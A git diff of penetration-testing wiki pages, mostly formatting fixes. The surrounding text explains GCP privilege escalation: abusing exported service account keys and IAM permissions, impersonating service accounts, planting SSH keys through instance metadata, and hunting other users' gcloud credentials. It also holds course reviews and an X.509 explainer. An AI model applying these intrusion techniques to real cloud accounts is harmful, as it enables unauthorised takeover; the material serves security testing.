+Therefore, if you **find a** [**service account key**](https://cloud.google.com/iam/docs/creating-managing-service-account-keys) **** stored on the instance you can bypass the limitation. These are **RSA private keys** that can be used to authenticate to the Google Cloud API and **request a new OAuth token with no scope limitations**.
 
 Check if any service account has exported a key at some point with:
 
@@ -320,7 +320,7 @@ The contents of the file look something like this:
 }
 ```
 
-Or, if **generated from the CLI **they will look like this:
+Or, if **generated from the CLI** they will look like this:
 
 ```json
 {
@@ -350,7 +350,7 @@ You should see `https://www.googleapis.com/auth/cloud-platform` listed in the sc
 
 
 
-### Service account impersonation <a href="service-account-impersonation" id="service-account-impersonation"></a>
+### Service account impersonation <a href="#service-account-impersonation" id="service-account-impersonation"></a>
 
 Impersonating a service account can be very useful to **obtain new and better privileges**.
 
@@ -360,7 +360,7 @@ There are three ways in which you can [impersonate another service account](http
 * Authorization **using Cloud IAM policies** (covered [here](gcp-iam-escalation.md#iam.serviceaccounttokencreator))
 * **Deploying jobs on GCP services** (more applicable to the compromise of a user account)
 
-### Granting access to management console <a href="granting-access-to-management-console" id="granting-access-to-management-console"></a>
+### Granting access to management console <a href="#granting-access-to-management-console" id="granting-access-to-management-console"></a>
 
 Access to the [GCP management console](https://console.cloud.google.com) is **provided to user accounts, not service accounts**. To log in to the web interface, you can **grant access to a Google account** that you control. This can be a generic "**@gmail.com**" account, it does **not have to be a member of the target organization**.
 
@@ -376,7 +376,7 @@ If you succeeded here, try **accessing the web interface** and exploring from th
 
 This is the **highest level you can assign using the gcloud tool**.
 
-### Spreading to Workspace via domain-wide delegation of authority <a href="spreading-to-g-suite-via-domain-wide-delegation-of-authority" id="spreading-to-g-suite-via-domain-wide-delegation-of-authority"></a>
+### Spreading to Workspace via domain-wide delegation of authority <a href="#spreading-to-g-suite-via-domain-wide-delegation-of-authority" id="spreading-to-g-suite-via-domain-wide-delegation-of-authority"></a>
 
 [**Workspace**](https://gsuite.google.com) is Google's c**ollaboration and productivity platform** which consists of things like Gmail, Google Calendar, Google Drive, Google Docs, etc.&#x20;
 
@@ -384,13 +384,13 @@ This is the **highest level you can assign using the gcloud tool**.
 
 Workspace has [its own API](https://developers.google.com/gsuite/aspects/apis), completely separate from GCP. Permissions are granted to Workspace and **there isn't any default relation between GCP and Workspace**.
 
-However, it's possible to **give** a service account **permissions** over a Workspace user. If you have access to the Web UI at this point, you can browse to **IAM -> Service Accounts** and see if any of the accounts have **"Enabled" listed under the "domain-wide delegation" column**. The column itself may **not appear if no accounts are enabled **(you can read the details of each service account to confirm this). As of this writing, there is no way to do this programatically, although there is a [request for this feature](https://issuetracker.google.com/issues/116182848) in Google's bug tracker.
+However, it's possible to **give** a service account **permissions** over a Workspace user. If you have access to the Web UI at this point, you can browse to **IAM -> Service Accounts** and see if any of the accounts have **"Enabled" listed under the "domain-wide delegation" column**. The column itself may **not appear if no accounts are enabled** (you can read the details of each service account to confirm this). As of this writing, there is no way to do this programatically, although there is a [request for this feature](https://issuetracker.google.com/issues/116182848) in Google's bug tracker.
 
 To create this relation it's needed to **enable it in GCP and also in Workforce**.
 
 #### Test Workspace access
 
-To test this access you'll need the** service account credentials exported in JSON** format. You may have acquired these in an earlier step, or you may have the access required now to create a key for a service account you know to have domain-wide delegation enabled.
+To test this access you'll need the **service account credentials exported in JSON** format. You may have acquired these in an earlier step, or you may have the access required now to create a key for a service account you know to have domain-wide delegation enabled.
 
 This topic is a bit tricky… your service account has something called a "client\_email" which you can see in the JSON credential file you export. It probably looks something like `account-name@project-name.iam.gserviceaccount.com`. If you try to access Workforce API calls directly with that email, even with delegation enabled, you will fail. This is because the Workforce directory will not include the GCP service account's email addresses. Instead, to interact with Workforce, we need to actually impersonate valid Workforce users.
 
diff --git a/cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md b/cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md
index 0643f3cb..37b91613 100644
--- a/cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md
+++ b/cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md
@@ -25,7 +25,7 @@ The following tools can be used to generate variations of the name given and sea
 
 ## Privilege Escalation
 
-If the bucket policy allowed either “allUsers” or “allAuthenticatedUsers” to **write to their bucket policy **(the **storage.buckets.setIamPolicy** permission)**, **then anyone can modify the bucket policy and grant himself full access.
+If the bucket policy allowed either “allUsers” or “allAuthenticatedUsers” to **write to their bucket policy** (the **storage.buckets.setIamPolicy** permission)**,** then anyone can modify the bucket policy and grant himself full access.
 
 ### Check Permissions
 
diff --git a/cloud-security/gcp-security/gcp-compute-enumeration.md b/cloud-security/gcp-security/gcp-compute-enumeration.md
index 2a268496..bd17d606 100644
--- a/cloud-security/gcp-security/gcp-compute-enumeration.md
+++ b/cloud-security/gcp-security/gcp-compute-enumeration.md
@@ -84,13 +84,13 @@ If you compromises a compute instance you should also check the actions mentione
 
 ### Custom Images
 
-**Custom compute images may contain sensitive details **or other vulnerable configurations that you can exploit. You can query the list of non-standard images in a project with the following command:
+**Custom compute images may contain sensitive details** or other vulnerable configurations that you can exploit. You can query the list of non-standard images in a project with the following command:
 
 ```
 gcloud compute images list --no-standard-images
 ```
 
-You can then** **[**export**](https://cloud.google.com/sdk/gcloud/reference/compute/images/export)** the virtual disks **from any image in multiple formats. The following command would export the image `test-image` in qcow2 format, allowing you to download the file and build a VM locally for further investigation:
+You can then **** [**export**](https://cloud.google.com/sdk/gcloud/reference/compute/images/export) **the virtual disks** from any image in multiple formats. The following command would export the image `test-image` in qcow2 format, allowing you to download the file and build a VM locally for further investigation:
 
 ```bash
 gcloud compute images export --image test-image \
diff --git a/cloud-security/gcp-security/gcp-interesting-permissions.md b/cloud-security/gcp-security/gcp-interesting-permissions.md
index f0cd398a..33b34074 100644
--- a/cloud-security/gcp-security/gcp-interesting-permissions.md
+++ b/cloud-security/gcp-security/gcp-interesting-permissions.md
@@ -10,7 +10,7 @@ This single permission lets you **launch new deployments** of resources into GCP
 
 ![](<../../.gitbook/assets/image (626) (1).png>)
 
-In the following example [this script](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/deploymentmanager.deployments.create.py) is used to deploy a compute instance, but any resource listed in `gcloud deployment-manager types list`_ _could be actually deployed:
+In the following example [this script](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/deploymentmanager.deployments.create.py) is used to deploy a compute instance, but any resource listed in `gcloud deployment-manager types list` __ could be actually deployed:
 
 ## IAM
 
@@ -62,7 +62,7 @@ The exploit script for this method can be found [here](https://github.com/RhinoS
 
 ### iam.serviceAccounts.signBlob
 
-The _iam.serviceAccounts.signBlob_ permission “allows signing of arbitrary payloads” in GCP. This means we can **create a signed blob that requests an access token from the Service Account **we are targeting.
+The _iam.serviceAccounts.signBlob_ permission “allows signing of arbitrary payloads” in GCP. This means we can **create a signed blob that requests an access token from the Service Account** we are targeting.
 
 ![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image4-1000x168.png)
 
@@ -125,7 +125,7 @@ For this method, we will be **creating a new Cloud Function with an associated S
 
 The **required permissions** for this method are as follows:
 
-* _cloudfunctions.functions.call _**OR**_ cloudfunctions.functions.setIamPolicy_
+* _cloudfunctions.functions.call_ **OR** _cloudfunctions.functions.setIamPolicy_
 * _cloudfunctions.functions.create_
 * _cloudfunctions.functions.sourceCodeSet_
 * _iam.serviceAccounts.actAs_
@@ -174,13 +174,13 @@ The exploit script for this method can be found [here](https://github.com/RhinoS
 
 ### run.services.create (iam.serviceAccounts.actAs)
 
-Similar to the _cloudfunctions.functions.create_ method, this method creates a **new Cloud Run Service **that, when invoked, **returns the Service Account’s** access token by accessing the metadata API of the server it is running on. A Cloud Run service will be deployed and a request can be performed to it to get the token.
+Similar to the _cloudfunctions.functions.create_ method, this method creates a **new Cloud Run Service** that, when invoked, **returns the Service Account’s** access token by accessing the metadata API of the server it is running on. A Cloud Run service will be deployed and a request can be performed to it to get the token.
 
 The following **permissions are required** for this method:
 
 * _run.services.create_
 * _iam.serviceaccounts.actAs_
-* _run.services.setIamPolicy _**OR**_ run.routes.invoke_
+* _run.services.setIamPolicy_ **OR** _run.routes.invoke_
 
 ![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image8-1000x503.png)
 
@@ -216,7 +216,7 @@ A similar method may be possible with Cloud Tasks, but we were not able to do it
 
 ### orgpolicy.policy.set
 
-This method does **not necessarily grant you more IAM permissions**, but it may **disable some barriers **that are preventing certain actions. For example, there is an Organization Policy constraint named _appengine.disableCodeDownload_ that prevents App Engine source code from being downloaded by users of the project. If this was enabled, you would not be able to download that source code, but you could use _orgpolicy.policy.set_ to disable the constraint and then continue with the source code download.
+This method does **not necessarily grant you more IAM permissions**, but it may **disable some barriers** that are preventing certain actions. For example, there is an Organization Policy constraint named _appengine.disableCodeDownload_ that prevents App Engine source code from being downloaded by users of the project. If this was enabled, you would not be able to download that source code, but you could use _orgpolicy.policy.set_ to disable the constraint and then continue with the source code download.
 
 ![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image5-1.png)
 
@@ -266,7 +266,7 @@ The exploit script for this method can be found [here](https://github.com/RhinoS
 
 ## \*.setIamPolicy
 
-If you owns a user that has the **`setIamPolicy`** permission in a resource you can **escalate privileges in that resource **because you will be able to change the IAM policy of that resource and give you more privileges over it.
+If you owns a user that has the **`setIamPolicy`** permission in a resource you can **escalate privileges in that resource** because you will be able to change the IAM policy of that resource and give you more privileges over it.
 
 A few that are worth looking into for privilege escalation are listed here:
 
diff --git a/cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md b/cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md
index a7041b01..756d8588 100644
--- a/cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md
+++ b/cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md
@@ -4,7 +4,7 @@ in this scenario we are going to suppose that you **have compromised a non privi
 
 Amazingly, GPC permissions of the compute engine you have compromised may help you to **escalate privileges locally inside a machine**. Even if that won't always be very helpful in a cloud environment, it's good to know it's possible.
 
-## Read the scripts <a href="follow-the-scripts" id="follow-the-scripts"></a>
+## Read the scripts <a href="#follow-the-scripts" id="follow-the-scripts"></a>
 
 **Compute Instances** are probably there to **execute some scripts** to perform actions with their service accounts.
 
@@ -30,7 +30,7 @@ curl "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?re
     -H "Metadata-Flavor: Google"
 ```
 
-## Modifying the metadata <a href="modifying-the-metadata" id="modifying-the-metadata"></a>
+## Modifying the metadata <a href="#modifying-the-metadata" id="modifying-the-metadata"></a>
 
 If you can **modify the instance's metadata**, there are numerous ways to escalate privileges locally. There are a few scenarios that can lead to a service account with this permission:
 
@@ -48,7 +48,7 @@ Although Google [recommends](https://cloud.google.com/compute/docs/access/servic
 * `https://www.googleapis.com/auth/compute`
 * `https://www.googleapis.com/auth/cloud-platfo`rm
 
-## **Add SSH keys **
+## **Add SSH keys**&#x20;
 
 ### **Add SSH keys to custom metadata**
 
@@ -101,7 +101,7 @@ bob:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2fNZlw22d3mIAcfRV24bmIrOUn8l9qgOGj1LQ
 alice:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDnthNXHxi31LX8PlsGdIF/wlWmI0fPzuMrv7Z6rqNNgDYOuOFTpM1Sx/vfvezJNY+bonAPhJGTRCwAwytXIcW6JoeX5NEJsvEVSAwB1scOSCEAMefl0FyIZ3ZtlcsQ++LpNszzErreckik3aR+7LsA2TCVBjdlPuxh4mvWBhsJAjYS7ojrEAtQsJ0mBSd20yHxZNuh7qqG0JTzJac7n8S5eDacFGWCxQwPnuINeGoacTQ+MWHlbsYbhxnumWRvRiEm7+WOg2vPgwVpMp4sgz0q5r7n/l7YClvh/qfVquQ6bFdpkVaZmkXoaO74Op2Sd7C+MBDITDNZPpXIlZOf4OLb alice
 ```
 
-Now, you can** re-write the SSH key metadata** for your instance with the following command:
+Now, you can **re-write the SSH key metadata** for your instance with the following command:
 
 ```bash
 gcloud compute instances add-metadata [INSTANCE] --metadata-from-file ssh-keys=meta.txt
@@ -151,7 +151,7 @@ This will **generate a new SSH key, add it to your existing user, and add your e
 
 ## **Using OS Login**
 
-[OS Login](https://cloud.google.com/compute/docs/oslogin/) is an alternative to managing SSH keys. It links a** Google user or service account to a Linux identity**, relying on IAM permissions to grant or deny access to Compute Instances.
+[OS Login](https://cloud.google.com/compute/docs/oslogin/) is an alternative to managing SSH keys. It links a **Google user or service account to a Linux identity**, relying on IAM permissions to grant or deny access to Compute Instances.
 
 OS Login is [enabled](https://cloud.google.com/compute/docs/instances/managing-instance-access#enable\_oslogin) at the project or instance level using the metadata key of `enable-oslogin = TRUE`.
 
@@ -164,11 +164,11 @@ The following two **IAM permissions control SSH access to instances with OS Logi
 
 Unlike managing only with SSH keys, these permissions allow the administrator to control whether or not `sudo` is granted.
 
-If your service account has these permissions.** You can simply run the `gcloud compute ssh [INSTANCE]`** command to [connect manually as the service account](https://cloud.google.com/compute/docs/instances/connecting-advanced#sa\_ssh\_manual). **Two-factor **is **only** enforced when using **user accounts**, so that should not slow you down even if it is assigned as shown above.
+If your service account has these permissions. **You can simply run the `gcloud compute ssh [INSTANCE]`** command to [connect manually as the service account](https://cloud.google.com/compute/docs/instances/connecting-advanced#sa\_ssh\_manual). **Two-factor** is **only** enforced when using **user accounts**, so that should not slow you down even if it is assigned as shown above.
 
 Similar to using SSH keys from metadata, you can use this strategy to **escalate privileges locally and/or to access other Compute Instances** on the network.
 
-## SSH keys at project level <a href="sshing-around" id="sshing-around"></a>
+## SSH keys at project level <a href="#sshing-around" id="sshing-around"></a>
 
 Following the details mentioned in the previous section you can try to compromise more VMs.
 
@@ -182,7 +182,7 @@ If you're really bold, you can also just type `gcloud compute ssh [INSTANCE]` to
 
 ## Search for Keys in the filesystem
 
-It's quite possible that** other users on the same box have been running `gcloud`** commands using an account more powerful than your own. You'll **need local root** to do this.
+It's quite possible that **other users on the same box have been running `gcloud`** commands using an account more powerful than your own. You'll **need local root** to do this.
 
 First, find what `gcloud` config directories exist in users' home folders.
 
diff --git a/cloud-security/github-security/basic-github-information.md b/cloud-security/github-security/basic-github-information.md
index 0c92cc7d..9a3c26a4 100644
--- a/cloud-security/github-security/basic-github-information.md
+++ b/cloud-security/github-security/basic-github-information.md
@@ -59,6 +59,18 @@ You can **compare the permissions** of each role in this table [https://docs.git
 
 You can also **create your own roles** in _https://github.com/organizations/\<org\_name>/settings/roles_
 
+### Groups
+
+You can **list the groups created in an organization** in _https://github.com/orgs/\<org\_name>/teams_. Note that to see the groups which are children of other groups you need to access each parent group
+
+![](<../../.gitbook/assets/image (630).png>)
+
+### Users
+
+The users of an organization can be **listed** in _https://github.com/orgs/\<org\_name>/people._
+
+In the information of each user you can see the **teams the user is member of**, and the **repos the user has access to**.
+
 ## Github Authentication
 
 Github offers different ways to authenticate to your account and perform actions on your behalf.
@@ -114,6 +126,7 @@ Some security recommendations:
 * Don't build a GitHub App if you _only_ want to act as a GitHub user and do everything that user can do.
 * If you are using your app with GitHub Actions and want to modify workflow files, you must authenticate on behalf of the user with an OAuth token that includes the `workflow` scope. The user must have admin or write permission to the repository that contains the workflow file. For more information, see "[Understanding scopes for OAuth apps](https://docs.github.com/en/apps/building-oauth-apps/understanding-scopes-for-oauth-apps/#available-scopes)."
 * **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-github-apps).
+*
 
 ## References
 
diff --git a/courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md b/courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md
index d8e27724..f929a306 100644
--- a/courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md
+++ b/courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md
@@ -4,19 +4,19 @@
 
 ### Course: [**Android & Mobile App Pentesting**](https://my.ine.com/CyberSecurity/courses/cfd5ec2b/android-mobile-app-pentesting)****
 
-This is the course to** prepare for the eMAPT certificate exam**. It will teach you the **basics of Android** as OS, how the **applications works**, the **most sensitive components** of the Android applications, and how to **configure and use** the main **tools** to test the applications. The goal is to **prepare you to be able to pentest Android applications in the real life**.
+This is the course to **prepare for the eMAPT certificate exam**. It will teach you the **basics of Android** as OS, how the **applications works**, the **most sensitive components** of the Android applications, and how to **configure and use** the main **tools** to test the applications. The goal is to **prepare you to be able to pentest Android applications in the real life**.
 
-I found the course to be a great one for** people that don't have any experience pentesting Android** applications. However, **if** you are someone with **experience** in the topic and you have access to the course I also recommend you to **take a look to it**. That **was my case** when I did this course and even having a few years of experience pentesting Android applications **this course taught me some Android basics I didn't know and some new tricks**.
+I found the course to be a great one for **people that don't have any experience pentesting Android** applications. However, **if** you are someone with **experience** in the topic and you have access to the course I also recommend you to **take a look to it**. That **was my case** when I did this course and even having a few years of experience pentesting Android applications **this course taught me some Android basics I didn't know and some new tricks**.
 
-Finally, note **two more things** about this course: It has** great labs to practice** what you learn, however, it **doesn't explain every possible vulnerability** you can find in an Android application. Anyway, that's not an issue as** it teach you the basics to be able to understand other Android vulnerabilities**.\
+Finally, note **two more things** about this course: It has **great labs to practice** what you learn, however, it **doesn't explain every possible vulnerability** you can find in an Android application. Anyway, that's not an issue as **it teach you the basics to be able to understand other Android vulnerabilities**.\
 Besides, once you have completed the course (or before) you can go to the [**Hacktricks Android Applications pentesting section**](../mobile-apps-pentesting/android-app-pentesting/) and learn more tricks.
 
 ### Course: [**iOS & Mobile App Pentesting**](https://my.ine.com/CyberSecurity/courses/089d060b/ios-mobile-app-pentesting)****
 
-When I performed this course I didn't have much experience with iOS applications, and I found this **course to be a great resource to get me started quickly in the topic, so if you have the chance to perform the course don't miss the opportunity. **As the previous course, this course will teach you the **basics of iOS**, how the **iOS** **applications works**, the **most sensitive components** of the applications, and how to **configure and use** the main **tools** to test the applications.\
+When I performed this course I didn't have much experience with iOS applications, and I found this **course to be a great resource to get me started quickly in the topic, so if you have the chance to perform the course don't miss the opportunity.** As the previous course, this course will teach you the **basics of iOS**, how the **iOS** **applications works**, the **most sensitive components** of the applications, and how to **configure and use** the main **tools** to test the applications.\
 However, there is a very important difference with the Android course, if you want to follow the labs, I would recommend you to **get a jailbroken iOS or pay for some good iOS emulator.**
 
-As in the previous course, this course has some very useful labs to practice what you learn, but it doesn't explain every possible vulnerability of iOS applications. However, that's not an issue as** it teach you the basics to be able to understand other iOS vulnerabilities**.\
+As in the previous course, this course has some very useful labs to practice what you learn, but it doesn't explain every possible vulnerability of iOS applications. However, that's not an issue as **it teach you the basics to be able to understand other iOS vulnerabilities**.\
 Besides, once you have completed the course (or before) you can go to the [**Hacktricks iOS Applications pentesting section**](../mobile-apps-pentesting/ios-pentesting/) and learn more tricks.
 
 ### [eMAPT](https://elearnsecurity.com/product/emapt-certification/)
@@ -25,20 +25,20 @@ Besides, once you have completed the course (or before) you can go to the [**Hac
 
 The goal of this certificate is to **show** that you are capable of performing common **mobile applications pentests**.
 
-During the exam you are** given 2 vulnerable Android applications** and you need to **create** an A**ndroid** **application** that **exploits** the vulnerabilities automatically. In order to **pass the exam**, you need to **send** the **exploit** **application** (the apk and the code) and it must **exploit** the **other** **apps** **vulnerabilities**.
+During the exam you are **given 2 vulnerable Android applications** and you need to **create** an A**ndroid** **application** that **exploits** the vulnerabilities automatically. In order to **pass the exam**, you need to **send** the **exploit** **application** (the apk and the code) and it must **exploit** the **other** **apps** **vulnerabilities**.
 
-Having done the [**INE course about Android applications pentesting**](https://my.ine.com/CyberSecurity/courses/cfd5ec2b/android-mobile-app-pentesting)** is** **more than enough** to find the vulnerabilities of the applications. What I found to be more "complicated" of the exam was to **write an Android application** that exploits vulnerabilities. However, having some experience as Java developer and looking for tutorials on the Internet about what I wanted to do **I was able to complete the exam in just some hours**. They give you 7 days to complete the exam, so if you find the vulnerabilities you will have plenty of time to develop the exploit app.
+Having done the [**INE course about Android applications pentesting**](https://my.ine.com/CyberSecurity/courses/cfd5ec2b/android-mobile-app-pentesting) **is** **more than enough** to find the vulnerabilities of the applications. What I found to be more "complicated" of the exam was to **write an Android application** that exploits vulnerabilities. However, having some experience as Java developer and looking for tutorials on the Internet about what I wanted to do **I was able to complete the exam in just some hours**. They give you 7 days to complete the exam, so if you find the vulnerabilities you will have plenty of time to develop the exploit app.
 
-In this exam I **missed the opportunity to exploit more vulnerabilities**, however, **I lost a bit the "fear" to write Android applications to exploit a vulnerability**. So it felt just like** another part of the course to complete your knowledge in Android applications pentesting**.
+In this exam I **missed the opportunity to exploit more vulnerabilities**, however, **I lost a bit the "fear" to write Android applications to exploit a vulnerability**. So it felt just like **another part of the course to complete your knowledge in Android applications pentesting**.
 
 ## eLearnSecurity Web application Penetration Tester eXtreme (eWPTXv2) and the INE course related
 
 ### Course: [**Web Application Penetration Testing eXtreme**](https://my.ine.com/CyberSecurity/courses/630a470a/web-application-penetration-testing-extreme)****
 
 This course is the one meant to **prepare** you for the **eWPTXv2** **certificate** **exam**. \
-Even having been working as web pentester for several years before doing the course, it taught me several **neat hacking tricks about "weird" web vulnerabilities and ways to bypass protections**. Moreover, the course contains** pretty nice labs where you can practice what you learn**, and that is always helpful to fully understand the vulnerabilities.
+Even having been working as web pentester for several years before doing the course, it taught me several **neat hacking tricks about "weird" web vulnerabilities and ways to bypass protections**. Moreover, the course contains **pretty nice labs where you can practice what you learn**, and that is always helpful to fully understand the vulnerabilities.
 
-I think this course** isn't for web hacking beginners** (there are other INE courses for that like [**Web Application Penetration Testing**](https://my.ine.com/CyberSecurity/courses/38316560/web-application-penetration-testing)**). **However,** **if you aren't a beginner, independently on the hacking web "level" you think you have, **I definitely recommend you to take a look to the course** because I'm sure you **will learn new things** like I did.
+I think this course **isn't for web hacking beginners** (there are other INE courses for that like [**Web Application Penetration Testing**](https://my.ine.com/CyberSecurity/courses/38316560/web-application-penetration-testing)**).** However, **** if you aren't a beginner, independently on the hacking web "level" you think you have, **I definitely recommend you to take a look to the course** because I'm sure you **will learn new things** like I did.
 
 ### [eWPTXv2](https://elearnsecurity.com/product/ewptxv2-certification/)
 
@@ -47,7 +47,7 @@ I think this course** isn't for web hacking beginners** (there are other INE cou
 The exam was composed of a **few web applications full of vulnerabilities**. In order to pass the exam you will need to compromise a few machines abusing web vulnerabilities. However, note that that's not enough to pass the exam, you need to **send a professional pentest report detailing** all the vulnerabilities discovered, how to exploit them and how to remediate them.\
 **I reported more than 10 unique vulnerabilities** (most of them high/critical and presented in different places of the webs), including the read of the flag and several ways to gain RCE and I passed.
 
-**All the vulnerabilities I reported could be found explained in the **[**Web Application Penetration Testing eXtreme course**](https://my.ine.com/CyberSecurity/courses/630a470a/web-application-penetration-testing-extreme)**. **However, order to pass this exam I think that you **don't only need to know about web vulnerabilities**, but you need to be **experienced exploiting them**. So, if you are doing the course, at least practice with the labs and potentially play with other platform where you can improve your skills exploiting web vulnerabilities.
+**All the vulnerabilities I reported could be found explained in the** [**Web Application Penetration Testing eXtreme course**](https://my.ine.com/CyberSecurity/courses/630a470a/web-application-penetration-testing-extreme)**.** However, order to pass this exam I think that you **don't only need to know about web vulnerabilities**, but you need to be **experienced exploiting them**. So, if you are doing the course, at least practice with the labs and potentially play with other platform where you can improve your skills exploiting web vulnerabilities.
 
 ## Course: **Data Science on the Google Cloud Platform**
 
@@ -56,13 +56,13 @@ It's a very interesting basic course about **how to use the ML environment provi
 
 ## Course: **Machine Learning with scikit-learn Starter Pass**
 
-In the course [**Machine Learning with scikit-learn Starter Pass**](https://my.ine.com/DataScience/courses/58c4e71b/machine-learning-with-scikit-learn-starter-pass)** **you will learn, as the name indicates, **how to use scikit-learn to create Machine Learning models**.&#x20;
+In the course [**Machine Learning with scikit-learn Starter Pass**](https://my.ine.com/DataScience/courses/58c4e71b/machine-learning-with-scikit-learn-starter-pass) **** you will learn, as the name indicates, **how to use scikit-learn to create Machine Learning models**.&#x20;
 
 It's definitely recommended for people that haven't use scikit-learn (but know python)
 
 ## **Course: Classification Algorithms**
 
-The** **[**Classification Algorithms course**](https://my.ine.com/DataScience/courses/2c6de5ea/classification-algorithms)** **is a great course for people that is **starting to learn about machine learning**. Here you will find information about the main classification algorithms you need to know and some mathematical concepts like **logistic regression** and **gradient descent**, **KNN**, **SVM**, and **Decision trees**.
+The **** [**Classification Algorithms course**](https://my.ine.com/DataScience/courses/2c6de5ea/classification-algorithms) **** is a great course for people that is **starting to learn about machine learning**. Here you will find information about the main classification algorithms you need to know and some mathematical concepts like **logistic regression** and **gradient descent**, **KNN**, **SVM**, and **Decision trees**.
 
 It also shows how to **create models** with with **scikit-learn.**
 
@@ -72,6 +72,6 @@ The [**Decision Trees course**](https://my.ine.com/DataScience/courses/83fcfd52/
 
 It also explains **how to create tree models** with scikit-learn different techniques to **measure how good the created model is** and how to **visualize the tree**.
 
-The only drawback I could find was in some cases some lack of mathematical explanations about how the used algorithm works. However, this course is** pretty useful for people that are learning about Machine Learning**.
+The only drawback I could find was in some cases some lack of mathematical explanations about how the used algorithm works. However, this course is **pretty useful for people that are learning about Machine Learning**.
 
 ## &#x20;
diff --git a/cryptography/certificates.md b/cryptography/certificates.md
index cb32b10b..1748f72d 100644
--- a/cryptography/certificates.md
+++ b/cryptography/certificates.md
@@ -4,13 +4,13 @@
 
 In cryptography, a **public key certificate,** also known as a **digital certificate** or **identity certificate,** is an electronic document used to prove the ownership of a public key. The certificate includes information about the key, information about the identity of its owner (called the subject), and the digital signature of an entity that has verified the certificate's contents (called the issuer). If the signature is valid, and the software examining the certificate trusts the issuer, then it can use that key to communicate securely with the certificate's subject.
 
-In a typical [public-key infrastructure](https://en.wikipedia.org/wiki/Public-key_infrastructure) (PKI) scheme, the certificate issuer is a [certificate authority](https://en.wikipedia.org/wiki/Certificate_authority) (CA), usually a company that charges customers to issue certificates for them. By contrast, in a [web of trust](https://en.wikipedia.org/wiki/Web_of_trust) scheme, individuals sign each other's keys directly, in a format that performs a similar function to a public key certificate.
+In a typical [public-key infrastructure](https://en.wikipedia.org/wiki/Public-key\_infrastructure) (PKI) scheme, the certificate issuer is a [certificate authority](https://en.wikipedia.org/wiki/Certificate\_authority) (CA), usually a company that charges customers to issue certificates for them. By contrast, in a [web of trust](https://en.wikipedia.org/wiki/Web\_of\_trust) scheme, individuals sign each other's keys directly, in a format that performs a similar function to a public key certificate.
 
 The most common format for public key certificates is defined by [X.509](https://en.wikipedia.org/wiki/X.509). Because X.509 is very general, the format is further constrained by profiles defined for certain use cases, such as [Public Key Infrastructure (X.509)](https://en.wikipedia.org/wiki/PKIX) as defined in RFC 5280.
 
 ## x509 Common Fields
 
-* **Version Number: **Version of x509 format.
+* **Version Number:** Version of x509 format.
 * **Serial Number**: Used to uniquely identify the certificate within a CA's systems. In particular this is used to track revocation information.
 * **Subject**: The entity a certificate belongs to: a machine, an individual, or an organization.
   * **Common Name**: Domains affected by the certificate. Can be 1 or more and can contain wildcards.
@@ -27,7 +27,7 @@ The most common format for public key certificates is defined by [X.509](https:/
   * **Locality (L)**: Local place where the organisation can be found.
   * **Organization (O)**: Organisation name
   * **Organizational Unit (OU)**: Division of an organisation (like "Human Resources").
-* **Not Before**: The earliest time and date on which the certificate is valid. Usually set to a few hours or days prior to the moment the certificate was issued, to avoid [clock skew](https://en.wikipedia.org/wiki/Clock_skew#On_a_network) problems.
+* **Not Before**: The earliest time and date on which the certificate is valid. Usually set to a few hours or days prior to the moment the certificate was issued, to avoid [clock skew](https://en.wikipedia.org/wiki/Clock\_skew#On\_a\_network) problems.
 * **Not After**: The time and date past which the certificate is no longer valid.
 * **Public Key**: A public key belonging to the certificate subject. (This is one of the main parts as this is what is signed by the CA)
   * **Public Key Algorithm**: Algorithm used to generate the public key. Like RSA.
@@ -41,9 +41,9 @@ The most common format for public key certificates is defined by [X.509](https:/
     * In a Web certificate this will appear as a _X509v3 extension_ and will have the value `Digital Signature`
   * **Extended Key Usage**: The applications in which the certificate may be used. Common values include TLS server authentication, email protection, and code signing.
     * In a Web certificate this will appear as a _X509v3 extension_ and will have the value `TLS Web Server Authentication`
-  * **Subject Alternative Name: ** Allows users to specify additional host **names** for a single SSL **certificate**. The use of the SAN extension is standard practice for SSL certificates, and it's on its way to replacing the use of the common **name**.
-  * **Basic Constraint: **This extension describes whether the certificate is a CA certificate or an end entity certificate. A CA certificate is something that signs certificates of others and a end entity certificate is the certificate used in a web page for example (the last par of the chain).
-  *  **Subject Key Identifier** (SKI): This extension declares a unique **identifier** for the public **key** in the certificate. It is required on all CA certificates. CAs propagate their own SKI to the Issuer **Key Identifier** (AKI) extension on issued certificates. It's the hash of the subject public key.
+  * **Subject Alternative Name:** Allows users to specify additional host **names** for a single SSL **certificate**. The use of the SAN extension is standard practice for SSL certificates, and it's on its way to replacing the use of the common **name**.
+  * **Basic Constraint:** This extension describes whether the certificate is a CA certificate or an end entity certificate. A CA certificate is something that signs certificates of others and a end entity certificate is the certificate used in a web page for example (the last par of the chain).
+  * &#x20;**Subject Key Identifier** (SKI): This extension declares a unique **identifier** for the public **key** in the certificate. It is required on all CA certificates. CAs propagate their own SKI to the Issuer **Key Identifier** (AKI) extension on issued certificates. It's the hash of the subject public key.
   * **Authority Key Identifier**: It contains a key identifier which is derived from the public key in the issuer certificate. It's the hash of the issuer public key.
   * **Authority Information Access** (AIA): This extension contains at most two types of information :
     * Information about **how to get the issuer of this certificate** (CA issuer access method)
@@ -53,9 +53,9 @@ The most common format for public key certificates is defined by [X.509](https:/
 
 ### Difference between OSCP and CRL Distribution Points
 
